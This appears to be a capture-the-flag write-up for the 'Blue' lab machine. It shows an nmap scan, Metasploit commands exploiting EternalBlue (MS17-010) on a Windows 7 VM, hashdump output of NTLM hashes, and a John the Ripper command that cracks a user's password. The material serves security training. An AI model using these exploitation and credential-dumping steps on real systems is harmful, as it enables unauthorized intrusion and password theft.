Blue

Created by @darkstar7471

Tasks

  1. Recon

  2. Get Access

  3. Escalate

  4. Cracking

  5. Find Flags!

Recon

1) Scan the machine.

Created alias for IP using alias blue.thm="10.10.84.x"

$ nmap -T4 -p- -A blue.thm
Nmap scan report for ip-10-10-84-143.eu-west-1.compute.internal (10.10.84.143)
Host is up (0.00050s latency).
Not shown: 65526 closed ports
PORT      STATE SERVICE       VERSION
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds  Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3389/tcp  open  ms-wbt-server Microsoft Terminal Service
| ssl-cert: Subject: commonName=Jon-PC
| Not valid before: 2020-10-10T12:59:17
|_Not valid after:  2021-04-11T12:59:17
|_ssl-date: 2020-10-11T13:29:35+00:00; 0s from scanner time.
49152/tcp open  msrpc         Microsoft Windows RPC
49153/tcp open  msrpc         Microsoft Windows RPC
49154/tcp open  msrpc         Microsoft Windows RPC
49158/tcp open  msrpc         Microsoft Windows RPC
49159/tcp open  msrpc         Microsoft Windows RPC
MAC Address: 02:78:B8:DD:80:7F (Unknown)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.60%E=4%D=10/11%OT=135%CT=1%CU=36872%PV=Y%DS=1%DC=D%G=Y%M=0278B8
OS:%TM=5F8308C4%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=108%TI=I%CI=I%TS
OS:=7)SEQ(SP=104%GCD=1%ISR=108%TI=I%CI=RD%II=I%SS=S%TS=7)SEQ(SP=104%GCD=1%I
OS:SR=108%TI=I%II=I%SS=S%TS=7)OPS(O1=M2301NW8ST11%O2=M2301NW8ST11%O3=M2301N
OS:W8NNT11%O4=M2301NW8ST11%O5=M2301NW8ST11%O6=M2301ST11)WIN(W1=2000%W2=2000
OS:%W3=2000%W4=2000%W5=2000%W6=2000)ECN(R=Y%DF=Y%T=80%W=2000%O=M2301NW8NNS%
OS:CC=N%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%
OS:A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%
OS:DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%
OS:O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%
OS:W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%
OS:RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=80%CD=Z)

Network Distance: 1 hop
Service Info: Host: JON-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_nbstat: NetBIOS name: JON-PC, NetBIOS user: <unknown>, NetBIOS MAC: 02:78:b8:dd:80:7f (unknown)
| smb-os-discovery: 
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: Jon-PC
|   NetBIOS computer name: JON-PC\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2020-10-11T08:29:35-05:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-10-11 14:29:35
|_  start_date: 2020-10-11 13:59:15

TRACEROUTE
HOP RTT     ADDRESS
1   0.50 ms ip-10-10-84-143.eu-west-1.compute.internal (10.10.84.143)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1701.57 seconds

2) How many ports are open with a port number under 1000?

3

3) What is this machine vulnerable to? (Answer in the form of: ms??-???, ex: ms08-067)

Considering SMB 2.02 version is used, this machineis vulnerable to Eternal Blue exploit (MS17-010)

Gain Access

1) Start Metasploit

msfconsole

2) Find the exploitation code we will run against the machine. What is the full path of the code? (Ex: exploit/........)

search eternalblue 
use exploit/windows/smb/ms17_010_eternalblue

3) Show options and set the one required value. What is the name of this value? (All caps for submission)

show options
set RHOST blue.thm

4) Confirm that the exploit has run correctly. You may have to press enter for the DOS shell to appear. Background this shell (CTRL + Z). If this failed, you may have to reboot the target VM. Try running it again before a reboot of the target.

getuid
# NT AUTHORITY\SYSTEM

Escalate

Skipped 1-5 since already got NT Authority. Although can use post/multi/manage/shell_to_meterpreter module.

Skipping 6-8 since its asking to run commands to prove NT privilege

Cracking

Use hashdump on metepreter sheel to get hashes: (Placed on file named hashes)

Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::

1) Within our elevated meterpreter shell, run the command 'hashdump'. This will dump all of the passwords on the machine as long as we have the correct privileges to do so. What is the name of the non-default user?

Jon

2) Copy this password hash to a file and research how to crack it. What is the cracked password?

Use John to Crack to crack NT hashes with rockyou.txt

sudo john --format=NT --rules -w=/usr/share/wordlists/rockyou.txt hashes

Jon's password is alqfna22

Find Flags!

1) Flag1?

2) Flag2?

3) Flag3?

PreviousPopcornNextUntitled

Last updated

Was this helpful?